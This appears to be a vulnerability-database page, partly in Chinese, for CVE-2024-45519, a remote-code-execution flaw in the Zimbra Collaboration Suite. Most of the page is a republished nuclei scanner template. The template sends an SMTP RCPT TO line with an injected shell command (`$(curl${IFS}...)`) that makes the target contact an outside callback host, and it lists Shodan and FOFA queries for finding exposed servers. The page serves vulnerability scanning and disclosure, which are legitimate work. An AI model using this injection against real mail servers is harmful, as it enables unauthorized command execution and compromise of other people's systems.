CVE-2024-45519: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Zimbra Collaboration Suite | POC: 已公开

漏洞描述

SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality.

PoC代码[已公开]

id: CVE-2024-45519

info:
  name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution
  author: pdresearch,iamnoooob,parthmalhotra,ice3man543
  severity: critical
  description: |
    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality.
  reference:
    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
    - https://blog.projectdiscovery.io/zimbra-remote-code-execution/
  classification:
    epss-score: 0.9415
    epss-percentile: 0.99909
    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
  metadata:
    vendor: synacor
    product: zimbra_collaboration_suite
    shodan-query:
      - http.title:"zimbra collaboration suite"
      - http.title:"zimbra web client sign in"
      - http.favicon.hash:1624375939
    fofa-query:
      - title="zimbra web client sign in"
      - title="zimbra collaboration suite"
  tags: cve,cve2024,rce,zimbra,kev,vkev

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/net');
      let address = Host+":"+Port;
      let conn;
      conn=  m.Open('tcp', address)
      conn.Send('EHLO localhost\r\n');
      conn.RecvString()
      conn.Send('MAIL FROM: <aaaa@mail.domain.com>\r\n');
      conn.RecvString()
      conn.Send('RCPT TO: <"aabbb$(curl${IFS}'+oast+')"@mail.domain.com>\r\n');
      conn.RecvString()
      conn.Send('DATA\r\n');
      conn.RecvString()
      conn.Send('aaa\r\n');
      conn.RecvString()
      conn.Send('.\r\n');
      resp = conn.RecvString()
      conn.Send('QUIT\r\n');
      conn.Close()
      resp
    args:
      Host: "{{Host}}"
      Port: 25
      oast: "{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        words:
          - "message delivered"
# digest: 4b0a00483046022100e90848c0a6406b00a69f94dae96a2fb1a8a306e7cb77f507ab7315752e5b4df8022100f9b671fb24df94b219f887720ffd3e3723253e3e569cfbcf4bbeccfdaf4a4c2a:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/cves/2024/CVE-2024-45519.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2022-37042: Zimbra Collaboration Suite 8.8.15/9.0 - Remote Code Execution POC

CVE-2018-14013: Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting POC

CVE-2020-7796: Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893）无POC

Whoogle search 代码执行漏洞（CVE-2024-53305）无POC